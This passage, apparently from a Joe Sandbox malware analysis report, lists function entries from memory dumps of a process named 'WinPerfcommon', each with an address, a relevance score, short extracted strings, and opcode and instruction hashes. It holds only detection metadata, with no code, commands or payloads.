                                                                  • Opcode Fuzzy Hash: bce981914e56a4366f2e83c415112c588366048c715235c4dfe0d650d9a06a1b
                                                                  • Instruction Fuzzy Hash: 1E51CF71A18A499EE788EB6CD8697B97FE0FB9A7A0F50017BC009D33D2CBB914118740
                                                                  Function 00007FF848F40B3F Relevance: 3.8, Strings: 3, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: 6109a50c7992df7b13f5edd77445e74f6352b26d15c240caab0565189ce61814
                                                                  • Instruction ID: a67d816186ba85fd39cb26922e47317edf5312b684bfe182c478480cecb09365
                                                                  • Opcode Fuzzy Hash: 6109a50c7992df7b13f5edd77445e74f6352b26d15c240caab0565189ce61814
                                                                  • Instruction Fuzzy Hash: 8CF028367299468BC7027B7DF8414E57744EB97176BE401BBD504C72A2E211186EC7D1
                                                                  Function 00007FF84935CBF0 Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X_L
                                                                  • API String ID: 0-1612919207
                                                                  • Opcode ID: 6ddcd9217b358cb2d114baa350fab37645abff4bc12f73c8244420c87060386f
                                                                  • Instruction ID: b3b89efe7145da7b5f699cb8b914464e214bdb49385b74a39e2f1b6bc226247e
                                                                  • Opcode Fuzzy Hash: 6ddcd9217b358cb2d114baa350fab37645abff4bc12f73c8244420c87060386f
                                                                  • Instruction Fuzzy Hash: DAC18330A18A5D8FDB98EF18D8999B9B3F2FF59714B1441A9D00EC7296DA35FC42CB40
                                                                  Function 00007FF84935BE19 Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J3I
                                                                  • API String ID: 0-2906232164
                                                                  • Opcode ID: bd85f05fd314bd573340b4626708e4203e28718d5927c26bbec4878bb3c5349d
                                                                  • Instruction ID: 5f8aff97c1ea39fd469f722f6cbe9e24a6d9ef0b5c227c98b6ea18ea7cb2bc5c
                                                                  • Opcode Fuzzy Hash: bd85f05fd314bd573340b4626708e4203e28718d5927c26bbec4878bb3c5349d
                                                                  • Instruction Fuzzy Hash: 3F916C3180C5C9CFE778EE18D8565B4B7E0FF4A3B0B0412FAD58EC7593D928A8168B81
                                                                  Function 00007FF84935C9DB Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (T3I
                                                                  • API String ID: 0-3558621861
                                                                  • Opcode ID: aa39e97080995c85916c61365f41fd318bef684dfc2416bfa357df562d710333
                                                                  • Instruction ID: 3351a2d192a43a3d1366ac33d1dc3b5aca9cb39165fb3b92e50b2540c92d0d54
                                                                  • Opcode Fuzzy Hash: aa39e97080995c85916c61365f41fd318bef684dfc2416bfa357df562d710333
                                                                  • Instruction Fuzzy Hash: D071D330D1D68E8EEB65EF6888546BDBBF1FF4A794F1401BAC00ED7186EE286841C741
                                                                  Function 00007FF84935B9A4 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @H3I
                                                                  • API String ID: 0-1068681053
                                                                  • Opcode ID: b89fb33618f081d8ed7fafc0c310262ca8af75f5dbee1a768912e55222514293
                                                                  • Instruction ID: c186f4ccf6a983c689f6a8094db26794d5bcd40375372d4bac0423d1eff8ee84
                                                                  • Opcode Fuzzy Hash: b89fb33618f081d8ed7fafc0c310262ca8af75f5dbee1a768912e55222514293
                                                                  • Instruction Fuzzy Hash: 1571C130D1DA8ACFD768EF18C4505BEBBB1FF99350F1056BAD00AD72C6DE28A9058742
                                                                  Function 00007FF849354348 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: cdeb1bd86ed07aff4232dc9fa2207644930ea809e58513014d55db845ac0c7d2
                                                                  • Instruction ID: 92a2b2b0bf56069d4cabf1980b5bc858ef7a2ad921268cff00e124dc7670df5c
                                                                  • Opcode Fuzzy Hash: cdeb1bd86ed07aff4232dc9fa2207644930ea809e58513014d55db845ac0c7d2
                                                                  • Instruction Fuzzy Hash: 12515B70D0C69A9FDB6DEF98C4546BDBBB1FF4A350F1055BAC00AE7296CA386901CB50
                                                                  Function 00007FF8493599B8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 10ff1ab6b709ca572c5493b747343e02ef2b8f1973d0aeba6ab07f11eeb1c501
                                                                  • Instruction ID: 1a91f7901cd7bc895379e569d8460fc329481e6897601c142ba40b659afecb13
                                                                  • Opcode Fuzzy Hash: 10ff1ab6b709ca572c5493b747343e02ef2b8f1973d0aeba6ab07f11eeb1c501
                                                                  • Instruction Fuzzy Hash: 32516B30D0C58A9FEB69EFA8D4555FDFBB1FF4A354F5050BAC00AA7286CA382901CB51
                                                                  Function 00007FF849352DAB Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `I
                                                                  • API String ID: 0-1172803333
                                                                  • Opcode ID: 9634a8196a2b5d4c518292d338ec42a72823a2dd0d8b3f4f2cab3c6b40665f02
                                                                  • Instruction ID: c85eb26ec05665b9bbe72034459c4938ddcd2c6a4ceaab972caf6c71634bfdd0
                                                                  • Opcode Fuzzy Hash: 9634a8196a2b5d4c518292d338ec42a72823a2dd0d8b3f4f2cab3c6b40665f02
                                                                  • Instruction Fuzzy Hash: 4F316E31E1CA5A8FDB58EB68D4A19A8F7E1FF49750B145139D01EC3282CF24BC51CB84
                                                                  Function 00007FF8493501A8 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Pb3I
                                                                  • API String ID: 0-1517376500
                                                                  • Opcode ID: 28ae9aa53aa3a4af70a3aa948fdb6a273e69b0cb2c3aec1ed64d1d3c4f157de0
                                                                  • Instruction ID: a2f2debd0d5a699fbdf23094d0ff896669718831eeb7c7df84c52a69edb86254
                                                                  • Opcode Fuzzy Hash: 28ae9aa53aa3a4af70a3aa948fdb6a273e69b0cb2c3aec1ed64d1d3c4f157de0
                                                                  • Instruction Fuzzy Hash: FC112631E0CA8E5FEB74AE6888491BDA7E1EF5F3A0F41013AD04DE3281DD643C068781
                                                                  Function 00007FF8493545B5 Relevance: .4, Instructions: 429COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f7fb9a4a67325dbfa05fa05d727d0fe53118c0d5b29e50b133b6552b1474e92
                                                                  • Instruction ID: edf6cc469e974aff15f5cc374eba807fd7465bdcc5b27f9bfeed100ce785a278
                                                                  • Opcode Fuzzy Hash: 7f7fb9a4a67325dbfa05fa05d727d0fe53118c0d5b29e50b133b6552b1474e92
                                                                  • Instruction Fuzzy Hash: F6F1B23091C5A68FEB6CDF18C0D56B577A1FF4A350B5455BDC84E8B68ECA38E881CB81
                                                                  Function 00007FF849359C2F Relevance: .4, Instructions: 423COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62ba8a8564717f3d0bc67334d6e47a204263d8bf626f3957cfc6efba25b14c11
                                                                  • Instruction ID: afae9eea5bbcbc141d4ae7e2b9c057019d01b01f555ed0dd66e39cc5cb440c27
                                                                  • Opcode Fuzzy Hash: 62ba8a8564717f3d0bc67334d6e47a204263d8bf626f3957cfc6efba25b14c11
                                                                  • Instruction Fuzzy Hash: CEF1E33091D5858FEB59DF18C4D06B47BA1FF4A355B9455FDC84ACB28BCA38E881CB81
                                                                  Function 00007FF84935AC71 Relevance: .4, Instructions: 417COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 70e045ac8084beef50d81332e9c1b1bdb62a9e829bca65e67de4e19c24fb210e
                                                                  • Instruction ID: ca29236b7be514d4d9d27a7ecb870b13d38ea393d7193e0071d4b89e62bdc9c0
                                                                  • Opcode Fuzzy Hash: 70e045ac8084beef50d81332e9c1b1bdb62a9e829bca65e67de4e19c24fb210e
                                                                  • Instruction Fuzzy Hash: 1DE1053090EB868FE378EF28D494575B7E1FF4A360B1455BEC48AC7682DB29B8429741
                                                                  Function 00007FF849355601 Relevance: .4, Instructions: 403COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 683de9dc24aa055db91b77e3c891d6c99f5030ca9cd888f2660cd3ed3aef7b92
                                                                  • Instruction ID: 9ee4f41af8afa7564a6ba67f7bb0aa2a41da74e7d9b557b7be63005664c3393f
                                                                  • Opcode Fuzzy Hash: 683de9dc24aa055db91b77e3c891d6c99f5030ca9cd888f2660cd3ed3aef7b92
                                                                  • Instruction Fuzzy Hash: 6ED1E230A0DB868FE379EF28D490575B7E1FF4A360F14257EC48AC7696DA29B842C741
                                                                  Function 00007FF8493545DF Relevance: .3, Instructions: 334COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34112d97a0cc9b3f8b0b8511ff60808bdbc9d5b6f156fc843a079690079137ed
                                                                  • Instruction ID: 54f6c6228be5fa316cba42f5a3855160a1f86fa99f37c73b47985ab85b7f25df
                                                                  • Opcode Fuzzy Hash: 34112d97a0cc9b3f8b0b8511ff60808bdbc9d5b6f156fc843a079690079137ed
                                                                  • Instruction Fuzzy Hash: 05C1B03051C5A68FEB1DEF18D0D95B177A1FF4A360B5455BDC84A8B68ECA38E881CB41
                                                                  Function 00007FF849359C4F Relevance: .3, Instructions: 333COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9fa0a7f8b1b1360be490ae169d7e7c3786385f4853f1a92df82c7bae23995cc
                                                                  • Instruction ID: 623ac9d410592f76a2a4c47d5a556a1fe71269538fd7f2b699d67b07d5649e97
                                                                  • Opcode Fuzzy Hash: e9fa0a7f8b1b1360be490ae169d7e7c3786385f4853f1a92df82c7bae23995cc
                                                                  • Instruction Fuzzy Hash: 80C1D23051DA828FEB5DDF14C0D05B1BBA1FF4A365B9455BDC84B8B58BCA38E891CB81
                                                                  Function 00007FF849353E72 Relevance: .3, Instructions: 327COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f80c72be2b71f7126617b1c6d9d36695ccd5a95da24c9ec0463a2dfb4d457b86
                                                                  • Instruction ID: 883f9d1e815a1299bd7aeb792252a617baaeefcca7c877d7a051ca2dfc52f663
                                                                  • Opcode Fuzzy Hash: f80c72be2b71f7126617b1c6d9d36695ccd5a95da24c9ec0463a2dfb4d457b86
                                                                  • Instruction Fuzzy Hash: 57C1C130A0CA869FE759EF28C0946B5F7A1FF5A360F545179C04EC7A86CB28F851CB90
                                                                  Function 00007FF849356F27 Relevance: .3, Instructions: 308COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43714679a166d9ca293b090124500322598c7ff925fe6e31a8eda34be2ae3711
                                                                  • Instruction ID: 0f51815c97e20df1270360908b6eef6aaa1cec776cc96c056542bdbd195aace3
                                                                  • Opcode Fuzzy Hash: 43714679a166d9ca293b090124500322598c7ff925fe6e31a8eda34be2ae3711
                                                                  • Instruction Fuzzy Hash: 1C21C332D0D1D3DEF2757A6928110F8A750AFCB2F4F1825BAC44FCA1C2DD0C2A8652DA
                                                                  Function 00007FF84935954F Relevance: .3, Instructions: 289COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85a3874290bc9bd8ce96015bbd0fa94f0e12a2b717d487dc0406edc5f13aa546
                                                                  • Instruction ID: ff5a6870db1cd4ad6a9590c85e5c1ad040c62f3343ec8ba4d80b79be5f0841fe
                                                                  • Opcode Fuzzy Hash: 85a3874290bc9bd8ce96015bbd0fa94f0e12a2b717d487dc0406edc5f13aa546
                                                                  • Instruction Fuzzy Hash: BCA1E83090DA868FE759EF28C0905B4F7A0FF59364F9451BAC04EC7A96DB28F851CB91
                                                                  Function 00007FF84935185D Relevance: .3, Instructions: 286COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b886310e6bb1bcfebc86e594220620da724df5d4e8895f3ca978804abca5fb7
                                                                  • Instruction ID: 9dbe4fcfe0450d6afce86b06af4d95c256cfa3fb70a8cc3cd020527169aa29ea
                                                                  • Opcode Fuzzy Hash: 5b886310e6bb1bcfebc86e594220620da724df5d4e8895f3ca978804abca5fb7
                                                                  • Instruction Fuzzy Hash: 7711C036D1D5D38EF2367E9924218B8DA509F5B2FCF1825BAD54E860C2DD0CAC812397
                                                                  Function 00007FF84935C198 Relevance: .3, Instructions: 285COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 590a4090bc17ec38fa79c6a956b8f55575bceb606ff928d49df24cfd87b03605
                                                                  • Instruction ID: 9b6f3a7bfb42795fb8fd2f8032f5643e0846ed4fa169ec3d9ccb3d5499ddc45f
                                                                  • Opcode Fuzzy Hash: 590a4090bc17ec38fa79c6a956b8f55575bceb606ff928d49df24cfd87b03605
                                                                  • Instruction Fuzzy Hash: F1115E32D4D5DB8EF275BE28186217CE6C06F5FBF8F1935BAC44E860D2DC4C28856292
                                                                  Function 00007FF849351884 Relevance: .3, Instructions: 273COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3bd8582300aeb8071f8dc5a0fb0ea778515faaa3495ba73325ef32a2e96c7be3
                                                                  • Instruction ID: 39942d0777f740ed779c3ae154b47d08612723e23c1a08b453a779760d368b33
                                                                  • Opcode Fuzzy Hash: 3bd8582300aeb8071f8dc5a0fb0ea778515faaa3495ba73325ef32a2e96c7be3
                                                                  • Instruction Fuzzy Hash: D411B631C0D5D38EE27A7AA81425879EA505F5B3BCF1C22BAD54E870C2DD0CAC846383
                                                                  Function 00007FF8493533A6 Relevance: .3, Instructions: 267COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d242bcc6c322e747b9cd98a76f2879fb1e3dbf080818dcabf01be0b8c3fb70f
                                                                  • Instruction ID: 498c7c1701dcd1fe7fe2d433fbda5f9aaeb89fdc53beed4810cfab22232ff4d9
                                                                  • Opcode Fuzzy Hash: 6d242bcc6c322e747b9cd98a76f2879fb1e3dbf080818dcabf01be0b8c3fb70f
                                                                  • Instruction Fuzzy Hash: BA81287190D682CFE739AE289455176F7E1EF4A3A0F54297ED08BC3282DE39B8418751
                                                                  Function 00007FF849358A26 Relevance: .3, Instructions: 251COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2ce8b0a84e0339169865873b9bc9528bcae4f6552357e50c70832d384eaa859
                                                                  • Instruction ID: 98229880fdcb38239ed534814395742ae07d18b3d22b4babac57de68dad59895
                                                                  • Opcode Fuzzy Hash: c2ce8b0a84e0339169865873b9bc9528bcae4f6552357e50c70832d384eaa859
                                                                  • Instruction Fuzzy Hash: 7B81077190DA868FE339BE289445575F7E0EF4A3A0F14197ED48EC3282DE29B8428752
                                                                  Function 00007FF849350825 Relevance: .2, Instructions: 243COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3188a844c258a8556ddf9f1e19d48c27b26b3014b2b7e5ff91fdf8a0e938482
                                                                  • Instruction ID: 9673116ec04fd415b8d1821ccbf2fdb3ee0f9b34c78599b00b0b80e20a6cffa6
                                                                  • Opcode Fuzzy Hash: b3188a844c258a8556ddf9f1e19d48c27b26b3014b2b7e5ff91fdf8a0e938482
                                                                  • Instruction Fuzzy Hash: 8B71153190D6C64FE736EF24D8916A4BBA1EF57360F1901F7C44CCB1E7DA2AA8458392
                                                                  Function 00007FF8493520CB Relevance: .2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 607378dffe35034e8cdcb6c89eefdb285413514b709a2e7bfa0cc4d520723855
                                                                  • Instruction ID: ea3c29a646fc83f6eeeb4fdc22c304ede11a2cb024ca54f71d808e0bd7b15210
                                                                  • Opcode Fuzzy Hash: 607378dffe35034e8cdcb6c89eefdb285413514b709a2e7bfa0cc4d520723855
                                                                  • Instruction Fuzzy Hash: FE81AE31D1D58A9FEBA5EF68C8546BDBBB1FF4A390F1004B9D00ED7282DE286941C751
                                                                  Function 00007FF849356BED Relevance: .2, Instructions: 231COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b83512d188353bc2c04e448f32f8a41ebee3bd5a009492fa1cdc53cf35ff1ff
                                                                  • Instruction ID: c0c9288df57f4ea7666e834e7849edd7fcd82527e72715c1e2cb41103900f85d
                                                                  • Opcode Fuzzy Hash: 8b83512d188353bc2c04e448f32f8a41ebee3bd5a009492fa1cdc53cf35ff1ff
                                                                  • Instruction Fuzzy Hash: 4761493590C4C94FE7B8EE18C8565B4B7D0FF8E3F4B0416B9D09EC76A2DD19A8068781
                                                                  Function 00007FF84935779B Relevance: .2, Instructions: 229COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95eb13671c4cbb956775940b192a5975b16c996cd7d05ceeecebdc32a7a4cb6d
                                                                  • Instruction ID: 8716c48dbbe8670cf0ecbf76683e36f9dc7ed5970cb298a3c9863c02d4e232e4
                                                                  • Opcode Fuzzy Hash: 95eb13671c4cbb956775940b192a5975b16c996cd7d05ceeecebdc32a7a4cb6d
                                                                  • Instruction Fuzzy Hash: B271A030D1D68A9EEB65EF6488556BCBBB1FF8A390F1400BAD00FD7192EE286841C755
                                                                  Function 00007FF848F408E8 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ed8a9d03a305ffc3f2810008aef66531b68a3c37ff0f8ba5dd1c6c74f428dda
                                                                  • Instruction ID: c4eeb276e095c00d60a81727d3c74a160cf8cd9c55c44c16a5e25187bf3d44aa
                                                                  • Opcode Fuzzy Hash: 6ed8a9d03a305ffc3f2810008aef66531b68a3c37ff0f8ba5dd1c6c74f428dda
                                                                  • Instruction Fuzzy Hash: E431253160D9184FE768EB1CE88A9B977D0EF5532070502BBE48AC71A7EE11AC8287C5
                                                                  Function 00007FF849355C27 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62f4898e28c8d4d36c0dce1c2836270a46a070297cade9f76d9adf19778e76b0
                                                                  • Instruction ID: 965c697a1bb6735424d9f671eca11d0886d32b17138c8da32aa76a008d43af38
                                                                  • Opcode Fuzzy Hash: 62f4898e28c8d4d36c0dce1c2836270a46a070297cade9f76d9adf19778e76b0
                                                                  • Instruction Fuzzy Hash: 9A418F32A0C959CFDB99EF28D495DB5B3E1FBA9360B0405A9D00EC7182DE24E841CB81
                                                                  Function 00007FF84935B297 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
